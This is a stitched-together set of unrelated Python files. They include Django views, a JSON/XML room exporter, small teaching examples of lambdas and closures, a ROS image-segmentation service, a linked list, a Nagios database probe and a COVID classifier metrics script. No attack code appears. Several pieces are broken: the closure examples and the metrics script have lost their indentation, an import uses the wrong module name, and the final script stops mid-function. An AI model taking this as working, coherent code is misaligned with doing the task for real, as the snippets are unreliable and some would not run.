def add_name_story_view(request, pk_crag, pk_route):
    """Show (GET) or process (POST) the form adding a name story to a route."""
    route = get_object_or_404(Route, pk=pk_route)
    if request.method != 'POST':
        form = NameStoryForm()
    else:
        form = NameStoryForm(request.POST)
        if form.is_valid():
            story = NameStory(
                route=route,
                story=form.cleaned_data['story'],
                source=form.cleaned_data['source'],
                isValidated=False,
            )
            story.save()
            return HttpResponseRedirect(reverse('crags:route_detail', args=[pk_crag, pk_route]))
    # Invalid POST falls through with the bound form so errors are displayed.
    return render(request, 'crags/name_story_create.html', {'form': form, 'route': route})
@login_required
def add_crag_view(request):
    """Show (GET) or process (POST) the crag creation form."""
    if request.method != 'POST':
        form = CragForm()
    else:
        form = CragForm(request.POST)
        if form.is_valid():
            crag = Crag(
                name=form.cleaned_data['name'],
                country=form.cleaned_data['country'],
                isValidated=False,
            )
            crag.save()
            return HttpResponseRedirect(reverse('crags:crags_index'))
    # Invalid POST falls through with the bound form so errors are displayed.
    return render(request, 'crags/crag_create.html', {'form': form})
@login_required
def add_route_view(request, pk_crag):
    """Show (GET) or process (POST) the form adding a route to a crag."""
    crag = get_object_or_404(Crag, pk=pk_crag)
    if request.method != 'POST':
        form = RouteForm()
    else:
        form = RouteForm(request.POST)
        if form.is_valid():
            route = Route(
                name=form.cleaned_data['name'],
                crag=crag,
                type=form.cleaned_data['type'],
                openIn=form.cleaned_data['openIn'],
                description=form.cleaned_data['description'],
                faIn=form.cleaned_data['faIn'],
                isValidated=False,
            )
            route.save()
            return HttpResponseRedirect(reverse('crags:route_detail', args=[pk_crag, route.id]))
    # Invalid POST falls through with the bound form so errors are displayed.
    return render(request, 'crags/route_create.html', {'form': form, 'crag': crag})
|
#!/usr/bin/python3.7
import json
import typing
from classes import Student, Room
class Controller:
    """Load students and rooms from JSON files, assign students to their
    rooms, and export the combined result as JSON or XML."""

    def __init__(self, students_path: str, rooms_path: str):
        """Remember paths; abort the program if either input file is missing."""
        # BUG FIX: the original used `and`, so the program aborted only when
        # BOTH files were missing; a single missing file crashed later.
        # Both checks still run so both warnings get printed.
        students_missing = self.check_file_not_exists(students_path)
        rooms_missing = self.check_file_not_exists(rooms_path)
        if students_missing or rooms_missing:
            exit()
        self.students_path = students_path
        self.rooms_path = rooms_path
        self.rooms = {}  # room id -> Room, filled by concatinate_students_to_rooms_from_json

    def concatinate_students_to_rooms_from_json(self) -> None:
        """Load all rooms, then append every student to its room."""
        for room in self.import_rooms_from_json():
            self.rooms[room.id] = room
        for student in self.import_students_from_json():
            self.rooms[student.room].addStudent(student)

    def import_rooms_from_json(self) -> 'typing.Iterable[Room]':
        """Yield Room objects parsed from the rooms JSON file."""
        with open(self.rooms_path, 'r') as rooms_file:
            for room in json.load(rooms_file):
                yield Room(**room)

    def import_students_from_json(self) -> 'typing.Iterable[Student]':
        """Yield Student objects parsed from the students JSON file."""
        with open(self.students_path, 'r') as students_file:
            for student in json.load(students_file):
                yield Student(**student)

    def export_json(self, output_path: str):
        """Write all rooms (with their students) to *output_path* as JSON."""
        with open(output_path, 'w') as outfile:
            json.dump(list(self.rooms.values()), outfile, indent=2, default=self.my_jsonEncoder)

    def export_xml(self, output_path: str):
        """Write all rooms (with their students) to *output_path* as XML."""
        with open(output_path, 'w') as outfile:
            for room in self.rooms.values():
                # Each room yields its XML fragments (including its students).
                for fragment in room.to_xml():
                    outfile.write(fragment)

    @staticmethod
    def my_jsonEncoder(obj: object):
        """json.dump fallback: delegate serialization to the object itself."""
        return obj.to_json()

    def check_file_not_exists(self, path: str) -> bool:
        """Return True (and print a warning) if *path* cannot be opened.

        BUG FIX: the original opened the file without ever closing it,
        leaking the file handle; `with` closes it immediately.
        """
        try:
            with open(path, "r"):
                return False
        except FileNotFoundError:
            print("File " + path + " not exist")
            return True
if __name__ == "__main__":
    # Parse the three required positional arguments.
    import argparse
    parser = argparse.ArgumentParser(description='give 3 arguments - path to students.json, path to rooms.json, output_path path (<name>.json,xml)')
    parser.add_argument('students', metavar='[path to students.json]', type=str, help='path to students.json file')
    parser.add_argument('rooms', metavar='[path to rooms.json]', type=str, help='path to rooms.json file')
    parser.add_argument('output_file', metavar='[output file (xml or json)]', type=str, help='output file ( xml or json) file')
    args = parser.parse_args()
    # init controller
    file_controll = Controller(students_path = args.students, rooms_path = args.rooms)
    # students to rooms & file export
    file_controll.concatinate_students_to_rooms_from_json()
    # BUG FIX: the original tested `args.output_file[3][-3:]`, i.e. the fourth
    # *character* of the path, which can never equal 'xml' — the XML branch
    # was unreachable. Test the filename's extension instead.
    if args.output_file[-3:] == 'xml':
        file_controll.export_xml(output_path = args.output_file)
    else:
        file_controll.export_json(output_path = args.output_file)
|
from unittest import TestCase
from src import core_printer
class TestCorePrinters(TestCase):
    """Checks CorePrinters' colored-text helpers and smoke-tests its printers."""

    p = core_printer.CorePrinters()

    def test_blue_text(self):
        expected = "\x1b[34m [*] \x1b[0mtest"
        self.assertEqual(self.p.blue_text("test"), expected)

    def test_green_text(self):
        expected = "\x1b[32m [+] \x1b[0mtest"
        self.assertEqual(self.p.green_text("test"), expected)

    # The remaining tests only verify the print helpers run without raising.
    def test_print_entry(self):
        self.p.print_entry()

    def test_print_d_module_start(self):
        self.p.print_d_module_start()

    def test_print_s_module_start(self):
        self.p.print_s_module_start()

    def test_print_config_start(self):
        self.p.print_config_start()

    def test_print_modules(self):
        self.p.print_modules(['modules/bing_search.py'])
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Date : 2020-04-12 21:24:13
# @Author : Fallen (xdd043@qq.com)
# @Link : https://github.com/fallencrasher/python-learning
# @Version : $Id$
# lambda expressions: `name = lambda params: expression` builds a small
# anonymous function and binds it to a name, equivalent to a one-line def.

# Add two values.
func1 = lambda a, b: a + b
print(func1(1, 2))

# Return the elements at indices 0 and 2 of any sliceable object, as a tuple.
func2 = lambda a: (a[0], a[2])
print(func2([1, 2, 3, 4]))

# Return the larger of two ints.
func3 = lambda a, b: b if b > a else a
print(func3(1, 4))
|
from yolact_interface import YolactInterface
import roslibpy
import numpy as np
import cv2
import base64
import os
class YolactService:
    """Bridges a YOLACT model to ROS via rosbridge: advertises a service that
    runs instance segmentation on a base64-encoded image.

    NOTE(review): the ROS connection is opened before the model is loaded;
    confirm the rosbridge host is reachable, otherwise __init__ blocks/fails.
    """

    def __init__(self, model_pth, srv_name, srv_type, host, port=9090, img_height=480, img_width=640):
        self.ros = roslibpy.Ros(host=host, port=port)
        self.ros.connect()
        self.model = YolactInterface(model_pth)  # TODO: Change load model function
        self.srv_name = srv_name
        self.srv_type = srv_type
        self.h = img_height
        self.w = img_width
        # Warm-up inference on a black frame so the first real request is fast.
        init_input = np.zeros([self.h, self.w, 3], np.uint8)
        self.model.run_once(init_input)  # TODO: Change inference once function

    def yolact_handler(self, request, response):
        """Service callback: decode request['image']['data'] (base64 JPEG/PNG),
        run the model, and fill response['result'].

        Returns True on success, False when the decoded image does not match
        the configured height/width.
        """
        print(request["image"])
        byte_data = base64.b64decode(request['image']['data'])
        np_img = np.frombuffer(byte_data, np.uint8)
        src = cv2.imdecode(np_img, cv2.IMREAD_COLOR)
        if src.shape[0] == self.h and src.shape[1] == self.w:
            # Debug visualization of the incoming frame.
            cv2.imshow('input', src)
            cv2.waitKey(1)
            response["result"] = self.model.run_once(src)  # TODO: Change inference once function
            print(response["result"])
            return True
        else:
            return False

    def run(self):
        """Advertise the service and block forever serving requests."""
        # start receiving client call...
        service = roslibpy.Service(self.ros, self.srv_name, self.srv_type)
        service.advertise(self.yolact_handler)
        print("Service start!")
        self.ros.run_forever()
        # if roslibpy lose connect with ros master and reconnect,
        # topics will not re-subscribe, see:
        # https://github.com/gramaziokohler/roslibpy/issues/29
if __name__ == '__main__':
    # CLI entry point: configure host/ports, image size, model path, GPU.
    import argparse
    parser = argparse.ArgumentParser(description='YOLACT ROS SERVER')
    parser.add_argument("--host", type=str, default="219.216.101.117", help="host of ros master")
    parser.add_argument("--port", type=int, default=9090, help="port of rosbridge")
    parser.add_argument("--srv_name", type=str, default="/run_yolact", help="advertise ros service name")
    parser.add_argument("--img_height", type=int, default=480, help="input image height")
    parser.add_argument("--img_width", type=int, default=640, help="input image width")
    parser.add_argument("--srv_type", type=str, default="semantic_msgs/RunInstance", help="advertise ros service type")
    parser.add_argument("--model_pth", type=str, default="./weights/yolact_base_54_800000.pth", help="weight path of yolact")
    parser.add_argument("--cuda_device", type=int, default=1, help="cude device id")
    args = parser.parse_args()
    # Pin the visible GPU before the model is constructed.
    os.environ["CUDA_VISIBLE_DEVICES"] = str(args.cuda_device)
    ys = YolactService(args.model_pth, args.srv_name, args.srv_type, args.host, args.port, args.img_height, args.img_width)
    ys.run()
|
# -*- coding: utf-8 -*-
# Copyright (c) 2017, Valiant Systems and contributors
# For license information, please see license.txt
from __future__ import unicode_literals
import frappe
from frappe.model.document import Document
from frappe import _
from frappe.desk.form.linked_with import get_linked_doctypes
class Section(Document):
    """Frappe doctype controller for Section; no custom behavior."""
    pass
@frappe.whitelist()
def get_chapter_list(course):
    """Return the names of all Chapter documents belonging to *course*."""
    course_filter = {'course': course}
    chapterlist = frappe.get_all('Chapter', fields=['name'], filters=course_filter)
    return chapterlist
|
from django.conf.urls import url
from . import views

# Route table: landing page, login processing, dashboard, and logout.
urlpatterns = [
    url(r'^$', views.landing, name='landing'),
    url(r'^process$', views.process, name='login_process'),
    url(r'^dashboard$', views.dashboard, name='dashboard'),
    url(r'^dashboard/logout$', views.logout, name='logout'),
]
|
# Generated by Django 2.2.3 on 2019-09-18 05:38
from django.db import migrations, models


class Migration(migrations.Migration):
    # Adds the optional integer-coded `cuisine_preference` field to `user`.

    dependencies = [
        ('kieFrontApp', '0003_auto_20190715_1308'),
    ]

    operations = [
        migrations.AddField(
            model_name='user',
            name='cuisine_preference',
            field=models.IntegerField(blank=True, choices=[(0, 'none'), (1, 'chinese'), (2, 'malay'), (3, 'indian'), (4, 'western')], default=0, null=True),
        ),
    ]
|
#!/usr/bin/env python
# -*- coding:utf-8 -*-
# -----------------------------------------------------------------------------
# 示例一、闭包函数,在外部函数设定环境变量
x = 100
def fun1():
"""
在外部函数中设置环境变量 x
fun1() 在运行时,给对象 a 返回一个函数 fun2()
同时将 x = 200 作为环境变量绑定到 a 内
"""
x = 200
def fun2():
y = x + 1
return y
return fun2
a = fun1()
print(a())
print('x的当前值为:', x)
# -----------------------------------------------------------------------------
# 示例二、闭包函数,不设定环境变量
x = 100
def fun1():
"""
fun2() 会按照 LEGB 法则,向上寻找变量 x,在全局作用域里获取变量 x = 100
"""
def fun2():
y = x + 1
return y
return fun2
a = fun1()
print(a())
print('x的当前值为:', x)
# -----------------------------------------------------------------------------
# 示例三、闭包函数,使用全局变量 global
x = 100
def fun1():
"""
global 声明 x 为全局变量,自动从全局作用域获取变量 x = 100
同时在 x 修改后,全局作用域的 x 的值也会被修改
"""
def fun2():
global x
x = x + 1
return x
return fun2
a = fun1()
print(a())
print('x的当前值为:', x)
|
# -*- coding: utf-8 -*-
#
# Copyright (c) 2021 Vladimir Shurygin. All rights reserved.
#
class User:
    """Value object identified solely by *name*; *email* is informational."""

    def __init__(self, name: str, email: str = None):
        self.name = name
        self.email = email

    def __eq__(self, other):
        # Only same-class instances can be equal, and only by name.
        return isinstance(other, self.__class__) and self.name == other.name

    def __ne__(self, other):
        return not self.__eq__(other)

    def __hash__(self):
        # Consistent with __eq__: hash on the name only.
        return hash(self.name)

    def __repr__(self):
        return f"<User(name='{self.name}', email='{self.email}')>"
|
from sklearn.svm import LinearSVC
from sklearn.metrics import accuracy_score

# 1. Data: the AND truth table.
learn_data = [[0,0], [1,0], [0,1], [1,1]]
learn_label = [0,0,0,1]
# 2. Model
clf = LinearSVC() #clf = model
# 3. Training
clf.fit(learn_data, learn_label)
# 4. Evaluation: predict on the same four inputs and report accuracy.
x_test = [[0,0], [1,0], [0,1], [1,1]]
y_pred = clf.predict(x_test)
print(x_test, "예측 결과", y_pred)
print('acc = ', accuracy_score([0,0,0,1], y_pred))
"""
1) Insertion, deletion and search of singly-linked list;
2) Assumes int type for data in list nodes.
Author: Wenru
"""
from typing import Optional
class Node:
    """Singly-linked list node holding an int and a pointer to the next node."""

    def __init__(self, data: int, next=None):
        self.data = data
        self._next = next


class SinglyLinkedList:
    """Singly-linked list of ints supporting search, insertion and deletion."""

    def __init__(self):
        self._head = None

    def find_by_value(self, value: int) -> Optional[Node]:
        """Return the first node whose data equals *value*, or None."""
        p = self._head
        while p and p.data != value:
            p = p._next
        return p

    def find_by_index(self, index: int) -> Optional[Node]:
        """Return the node at zero-based *index*, or None if out of range."""
        p = self._head
        position = 0
        while p and position != index:
            p = p._next
            position += 1
        return p

    def insert_value_to_head(self, value: int):
        """Prepend a new node holding *value*."""
        new_node = Node(value)
        self.insert_node_to_head(new_node)

    def insert_node_to_head(self, new_node: Node):
        """Prepend *new_node* (no-op on None)."""
        if new_node:
            new_node._next = self._head
            self._head = new_node

    def insert_value_after(self, node: Node, value: int):
        """Insert a new node holding *value* right after *node*."""
        new_node = Node(value)
        self.insert_node_after(node, new_node)

    def insert_node_after(self, node: Node, new_node: Node):
        """Link *new_node* right after *node* (no-op if either is None)."""
        if not node or not new_node:
            return
        new_node._next = node._next
        node._next = new_node

    def insert_value_before(self, node: Node, value: int):
        """Insert a new node holding *value* right before *node*."""
        new_node = Node(value)
        self.insert_node_before(node, new_node)

    def insert_node_before(self, node: Node, new_node: Node):
        """Link *new_node* right before *node*; no-op if *node* is absent."""
        if not self._head or not node or not new_node:
            return
        if self._head == node:
            self.insert_node_to_head(new_node)
            return
        # Walk to node's predecessor.
        current = self._head
        while current._next and current._next != node:
            current = current._next
        if not current._next:  # node is not even in the list
            return
        new_node._next = node
        current._next = new_node

    def delete_by_node(self, node: Node):
        """Unlink *node* from the list.

        Uses the O(1) copy-successor trick when *node* has a successor;
        otherwise falls back to an O(n) scan for the predecessor.
        """
        if not self._head or not node:
            return
        if node._next:
            node.data = node._next.data
            node._next = node._next._next
            return
        # node is the last one or not in the list
        current = self._head
        while current and current._next != node:
            current = current._next
        if not current:  # node not in the list
            return
        current._next = None

    def delete_by_value(self, value: int):
        """Remove every node whose data equals *value*.

        BUG FIX: the original guard was `if not value: return`, which made
        deleting the value 0 a silent no-op; only None should be rejected.
        """
        if not self._head or value is None:
            return
        # Fake head (data differs from value) guarantees every real node,
        # including the head, has a predecessor during the sweep.
        fake_head = Node(value + 1)
        fake_head._next = self._head
        prev, current = fake_head, self._head
        while current:
            if current.data != value:
                prev._next = current
                prev = prev._next
            current = current._next
        if prev._next:
            # Detach deleted tail nodes still hanging off the last kept node.
            prev._next = None
        self._head = fake_head._next  # in case head.data == value

    def __repr__(self) -> str:
        nums = []
        current = self._head
        while current:
            nums.append(current.data)
            current = current._next
        if len(nums) > 0:
            return "->".join(str(num) for num in nums)
        else:
            return ""

    def print_all(self):
        """Print the list as a->b->c followed by a newline."""
        current = self._head
        if current:
            print(f"{current.data}", end="")
            current = current._next
        while current:
            print(f"->{current.data}", end="")
            current = current._next
        print("\n", flush=True)
if __name__ == "__main__":
    # Build 14->13->...->0, then exercise insertion and all deletion paths.
    l = SinglyLinkedList()
    for i in range(15):
        l.insert_value_to_head(i)
    node9 = l.find_by_value(9)
    l.insert_value_before(node9, 20)
    l.insert_value_before(node9, 16)
    l.insert_value_before(node9, 16)
    l.delete_by_value(16)
    node11 = l.find_by_index(3)
    l.delete_by_node(node11)
    l.delete_by_node(l._head)
    l.delete_by_value(13)
    print(l)
#!/usr/bin/env python
# vim: set fileencoding=utf-8 :
# André Anjos <andre.anjos@idiap.ch>
# Thu Jan 20 18:08:37 2011 +0100
#
# Copyright (C) 2011-2012 Idiap Research Institute, Martigny, Switzerland
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, version 3 of the License.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
"""A wrapper for cmake that explains the options and has nice defaults.
"""
def main():
    """Print the platform string, e.g. 'linux-x86_64' or 'macosx-i686'."""
    from platform import system, architecture
    base = system().lower()
    if base == 'darwin':
        base = 'macosx'  # change name to something nicer and easy to identify
    arch = architecture()[0]
    if arch == '32bit':
        arch = 'i686'
    elif arch == '64bit':
        arch = 'x86_64'
    # PORTABILITY FIX: use the function-call print form, which produces the
    # same output on Python 2 but is also valid on Python 3 (the original
    # `print '...'` statement is a syntax error under Python 3).
    print('%s-%s' % (base, arch))


if __name__ == '__main__':
    main()
|
# Read an integer and report its parity (messages in Indonesian).
num = int(input("Enter a number: "))
print("X adalah genap" if num % 2 == 0 else "X adalah ganjil")
from django.urls import path
from drfvg import register_models
## models to register
from .models.technical_sheet import TechnicalSheet

## documents/
# Auto-generate REST routes for the listed models under the 'documents' app.
urlpatterns = [ ] + register_models( [ TechnicalSheet ], app_name='documents')
|
import pyqrcode
from pyqrcode import QRCode

# Encode the channel URL as a QR code and save it as an SVG image.
s = "https://www.youtube.com/channel/UCeO9hPCfRzqb2yTuAn713Mg"
url = pyqrcode.create(s)
url.svg("myyoutube.svg", scale = 8)
|
#!/usr/bin/env python
##############################################################################
# Copyright (c) Members of the EGEE Collaboration. 2011.
# See http://www.eu-egee.org/partners/ for details on the copyright
# holders.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS
# OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
##############################################################################
#
# NAME : check_request_per_user
#
# DESCRIPTION : Checks the available space per space token
#
# AUTHORS : Alexandre.Beche@cern.ch
#
##############################################################################
import commands
import datetime
import MySQLdb
import os
import time
from lcgdmcommon import *
class check_request_per_user:
    """Checks the available space per space token.

    Nagios probe: counts DPM requests per user DN over a time interval
    and reports the busiest DNs as performance data.
    """
    __version__ = "0.0.1"
    __nagios_id__ = "DM-REQUEST-PER-USER"

    # Default thresholds and query parameters.
    DEFAULT_WARNING = 30
    DEFAULT_CRITICAL = 10
    DEFAULT_INTERVAL = 10
    DEFAULT_RESULTS = 3
    DEFAULT_HOST = "localhost"

    # Specific parameters, where key = short, value = long (i.e. {"h":"help", "C:":"command="})
    # getopt format. The long version will be the one passed even when the short is specified
    __additional_opts__ = {"w:": "warning=",
                           "c:": "critical=",
                           "i:": "interval=",
                           "r:": "results=",
                           "h:": "host=",
                           "u:": "user=",
                           "p:": "password="}

    # Specific usage information.
    # BUG FIX: "--restults" was misspelled in the help text for the real
    # option --results.
    __usage__ = """
\t-w, --warning\tDefault warning threshold in percent of unused space in a space token. (Default: %d ).
\t-c, --critical\tDefault warning threshold in percent of unused space in a space token. (Default: %d ).
\t-i, --period\tDefault interval of time to retrieve the request in minute. (Default: %d).
\t-r, --results\tLimit the query to the %d user with the max queries.
\t-h, --host\tname of the machine which host the dpm_db database. (Default: %s).
\t-u, --user\tusername used for login to the database.
\t-p, --password\tpassword used for login to the database.
Description of work executed by the probe:
""" % (DEFAULT_WARNING, DEFAULT_CRITICAL, DEFAULT_INTERVAL, DEFAULT_RESULTS, DEFAULT_HOST)

    # Methods
    def __init__(self, opt=None, args=None):
        """
        Constructor
        @param opt Contains a dictionary with the long option name as the key, and the argument as value
        @param args Contains the arguments not associated with any option
        """
        # BUG FIX: mutable default arguments ({} / []) are shared across
        # calls; use None sentinels instead.
        if opt is None:
            opt = {}
        if args is None:
            args = []
        opt_warning = self.DEFAULT_WARNING
        opt_critical = self.DEFAULT_CRITICAL
        opt_interval = self.DEFAULT_INTERVAL
        opt_results = self.DEFAULT_RESULTS
        opt_host = self.DEFAULT_HOST
        opt_user = None
        opt_password = None
        if "warning" in opt:
            opt_warning = opt["warning"]
        if "critical" in opt:
            opt_critical = opt["critical"]
        if "interval" in opt:
            opt_interval = opt["interval"]
        if "results" in opt:
            opt_results = opt["results"]
        if "host" in opt:
            opt_host = opt["host"]
        if "user" in opt:
            opt_user = opt["user"]
        if "password" in opt:
            opt_password = opt["password"]
        self.warning = int(opt_warning)
        self.critical = int(opt_critical)
        self.interval = int(opt_interval)
        self.results = int(opt_results)
        self.host = opt_host
        self.user = opt_user
        self.password = opt_password

    def main(self):
        """
        Test code itself. May raise exceptions.
        @return A tuple (exit code, message, performance)
        """
        return_code = EX_OK
        return_data = ""
        performance_data = ""
        # Connect
        try:
            self.mysql = MySQLdb.connect(host=self.host,
                                         user=self.user, passwd=self.password)
        # BUG FIX: the original bare `except:` also swallowed SystemExit and
        # KeyboardInterrupt; catch only genuine errors.
        except Exception:
            return (EX_UNKNOWN, "Connection to the database failed", None)
        # Use the correct DB
        cursor = self.mysql.cursor()
        try:
            cursor.execute("use dpm_db")
            # Count requests per user CN over the last `interval` minutes,
            # keeping only the `results` busiest DNs.
            sql = "SELECT substring(client_dn,locate(\"CN=\", client_dn)+3), count(client_dn)"
            sql += " FROM dpm_req"
            sql += " WHERE ctime > (UNIX_TIMESTAMP(NOW())- " + str(self.interval * 60) + ")"
            sql += " GROUP BY substring(client_dn,locate(\"CN=\", client_dn)+3)"
            sql += " ORDER BY count(client_dn) DESC LIMIT " + str(self.results) + ";"
            cursor.execute(sql)
            total_request = 0
            for cn, requests in cursor.fetchall():
                total_request += requests
                performance_data += "\"" + cn + "\"=" + str(requests) + " "
            return_data = str(total_request) + " request(s) have been executed by the top " + str(self.results) + " DN"
        finally:
            # BUG FIX: the cursor was never closed.
            cursor.close()
        return (return_code, return_data, performance_data)
# When called directly
if __name__ == "__main__":
    # `run` (from lcgdmcommon) parses CLI options and drives the probe class.
    run(check_request_per_user)
|
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import csv
array=[['wrong_covid_normal','wrong_covid_pneu','correct_covid'],
['wrong_pneu_normal','correct_pneu','wrong_pneu_covid'],
['correct_normal','wrong_normal_pneu','wrong_normal_covid']]
results={1:{},2:{},3:{},4:{},5:{}}
for fo in range(1,6):
report=pd.read_excel('results/selected_fold{}.xlsx'.format(fo))
data={}
for index,item in report.iterrows():
images_num=item['tp']+item['fp']
data[item['name']]=[[],[],[]]
acc=item['tp']/(item['tp']+item['fp'])
covid_recall=item['correct_covid']/item['covid_num']
covid_Specificity=(images_num-item['covid_num']-item['wrong_covid'])/(images_num-item['covid_num']-item['wrong_covid']+item['wrong_covid'])
covid_accuracy=(images_num-item['covid_num']-item['wrong_covid']+item['correct_covid'])/(images_num-item['covid_num']-item['wrong_covid']+item['correct_covid']+item['wrong_covid']+item['not_detected_covid'])
pneu_recall=item['correct_pneu']/item['pneu_num']
pneu_Specificity=(images_num-item['pneu_num']-item['wrong_pneu'])/(images_num-item['pneu_num']-item['wrong_pneu']+item['wrong_pneu'])
pneu_accuracy=(images_num-item['pneu_num']-item['wrong_pneu']+item['correct_pneu'])/(images_num-item['pneu_num']-item['wrong_pneu']+item['correct_pneu']+item['wrong_pneu']+item['not_detected_pneu'])
normal_recall=item['correct_normal']/item['normal_num']
normal_Specificity=(images_num-item['normal_num']-item['wrong_normal'])/(images_num-item['normal_num']-item['wrong_normal']+item['wrong_normal'])
normal_accuracy=(images_num-item['normal_num']-item['wrong_normal']+item['correct_normal'])/(images_num-item['normal_num']-item['wrong_normal']+item['correct_normal']+item['wrong_normal']+item['not_detected_normal'])
results[fo][item['name']]={'acc':acc,'covid_recall':covid_recall,'covid_Specificity':covid_Specificity,
'covid_accuracy':covid_accuracy,'pneu_recall':pneu_recall,'pneu_Specificity':pneu_Specificity,
'pneu_accuracy':pneu_accuracy,
'normal_recall':normal_recall,'normal_Specificity':normal_Specificity,
'normal_accuracy':normal_accuracy}
for nn,aa in enumerate(array):
for a in aa:
data[item['name']][nn].append(item[a])
for key in data:
gt = ['NORMAL','PNEUMONIA','COVID-19']
preds = ["COVID-19", "PNEUMONIA", "NORMAL",]
fig, ax = plt.subplots()
im = ax.imshow(np.array(data[key]), interpolation='nearest', cmap=plt.cm.Blues)
index=key.find('-')
if 'concatenat' in key:
ax.set(xticks=np.arange(np.array(data[key]).shape[1]),
yticks=np.arange(np.array(data[key]).shape[0]),
# ... and label them with the respective list entries
xticklabels=gt, yticklabels=preds,
title='Confusion Matrix for the concatenated network-fold{}'.format(fo),
ylabel='Ground Truth Label',
xlabel='Predicted Label')
else:
ax.set(xticks=np.arange(np.array(data[key]).shape[1]),
yticks=np.arange(np.array(data[key]).shape[0]),
# ... and label them with the respective list entries
xticklabels=gt, yticklabels=preds,
title='Confusion Matrix for {}-fold{}'.format(key[:index],fo),
ylabel='Ground Truth Label',
xlabel='Predicted Label')
# Rotate the tick labels and set their alignment.
plt.setp(ax.get_xticklabels(), rotation=45, ha="right",
rotation_mode="anchor")
fmt = '.2f'
thresh = 1000000.
# Loop over data dimensions and create text annotations.
for i in range(len(gt)):
for j in range(len(preds)):
ax.text(j, i, format(np.array(data[key])[i, j]),
ha="center", va="center",
color="white" if np.array(data[key])[i, j] > thresh else "black")
fig.tight_layout()
#plt.show()
dash=key.find('-')
plt.savefig('{}-fold{}-confusion_matrix.pdf'.format(key[:dash],fo))
# ---- Aggregate per-fold metrics into 'Full' lists and an 'average' row ----
# NOTE(review): leading indentation was stripped from this dump; the nesting
# below is reconstructed from statement order and should be confirmed against
# the original script.  This section appears to run after a loop that filled
# results[1]..results[5] with per-network metric dicts.
results['Full']={'Xception':{}, 'concatenate':{},'ResNet50V2':{}}
results['average']={'Xception':{}, 'concatenate':{},'ResNet50V2':{}}
nets=['Xception','ResNet50V2','concatenate']
for net in nets:
    # NOTE(review): 'Full' and 'average' were just added to results, so this
    # loop also visits them; for fokey == 'Full' the append below pushes each
    # metric list onto itself, which is presumably why the averaging step
    # discards the last element with [:-1].
    for fokey in results:
        for netkey in results[fokey]:
            if net in netkey:
                for param in results[fokey][netkey]:
                    if param not in results['Full'][net]:
                        results['Full'][net][param]=[]
                    # collect this metric across all folds
                    results['Full'][net][param].append(results[fokey][netkey][param])
for net in results['Full']:
    for param in results['Full'][net]:
        # [:-1] drops the self-appended artifact noted above
        results['average'][net][param]=np.average(results['Full'][net][param][:-1])
# Flatten into table rows: for each fold (and the average), one row per
# network in the fixed order Xception, ResNet50V2, concatenated.  Each row is
# [covid/pneu/normal specificity, covid/pneu/normal accuracy].
temp_data=[]
for fo in [1,2,3,4,5,'average']:
    for net in results[fo]:
        if 'Xception' in net:
            temp_data.append([results[fo][net]['covid_Specificity'],
                              results[fo][net]['pneu_Specificity'],
                              results[fo][net]['normal_Specificity'],
                              results[fo][net]['covid_accuracy'],
                              results[fo][net]['pneu_accuracy'],
                              results[fo][net]['normal_accuracy']])
    for net in results[fo]:
        if 'ResNet' in net:
            temp_data.append([results[fo][net]['covid_Specificity'],
                              results[fo][net]['pneu_Specificity'],
                              results[fo][net]['normal_Specificity'],
                              results[fo][net]['covid_accuracy'],
                              results[fo][net]['pneu_accuracy'],
                              results[fo][net]['normal_accuracy']])
    for net in results[fo]:
        # matches both 'concatenate' and 'Concatenate' spellings
        if 'oncatenat' in net:
            temp_data.append([results[fo][net]['covid_Specificity'],
                              results[fo][net]['pneu_Specificity'],
                              results[fo][net]['normal_Specificity'],
                              results[fo][net]['covid_accuracy'],
                              results[fo][net]['pneu_accuracy'],
                              results[fo][net]['normal_accuracy']])
|
#!/usr/bin/env python
#
# Build LSE trees from a distance matrix and a topology
#
#
# python libs
import copy
import os
import sys
import StringIO
import shutil
from os.path import join, realpath, dirname
# spidir lib
try:
import Spidir
except ImportError:
sys.path.append(join(realpath(dirname(dirname(__file__))), "lib"))
import spidir
# rasmus libs
from rasmus import treelib
from rasmus import util
# rasmus.bio libs
from rasmus.bio import alignlib
from rasmus.bio import fasta
from rasmus.bio import phylip
from rasmus.bio import phylo
# Command-line option table consumed by rasmus.util.parseOptions:
# each entry is [short opt, long opt, conf key, usage string, {metadata}].
# Bare strings (e.g. "Output extensions") are section headers in the usage.
options = [
    ["v", "verbose", "verbose", "",
     {"single": True}],
    ["m:", "minsize=", "minsize", "<minimum gene family size>",
     {"single": True,
      "default": 3,
      "parser": int,
      "help": "minimum gene family size to reconstruct"}],
    ["M:", "maxsize=", "maxsize", "<maximum gene family size>",
     {"single": True,
      "default": 1000000000,  # no limit (effectively)
      "parser": int,
      "help": "maximum gene family size to reconstruct"}],
    ["i", "stdin", "stdin", "",
     {"single": True}],

    "Output extensions",
    # fixed: usage string was missing its closing '>'
    ["F:", "fastaext=", "fastaext", "<fasta extension>",
     {"default": [".fa", ".fasta"]}],
    ["A:", "alignext=", "alignext", "<align extension>",
     {"default": [".aln", ".afa", ".align"]}],
    ["T:", "treeext=", "treeext", "<tree extension>",
     {"default": [".tree"]}],
    ["U:", "usertreeext=", "usertreeext", "<user tree extension>",
     {"single": True,
      "default": None}],
    ["D:", "distext=", "distext", "<distance matrix extension>",
     {"default": [".dist"]}],
]

# Parse sys.argv immediately at import time; leftover positional arguments
# (the input files) land in conf["REST"].
conf = util.parseOptions(sys.argv, options,
                         resthelp="<alignments> ...", quit=True)
# filenames
def getFastaFile(conf, basename):
    """Return the fasta filename for *basename*.

    The last entry of conf["fastaext"] is treated as the canonical extension.
    """
    canonical_ext = conf["fastaext"][-1]
    return basename + canonical_ext
def getAlignFile(conf, basename):
    """Return the alignment filename for *basename*.

    Uses the last (canonical) extension configured in conf["alignext"].
    """
    return "".join([basename, conf["alignext"][-1]])
def getDistFile(conf, basename):
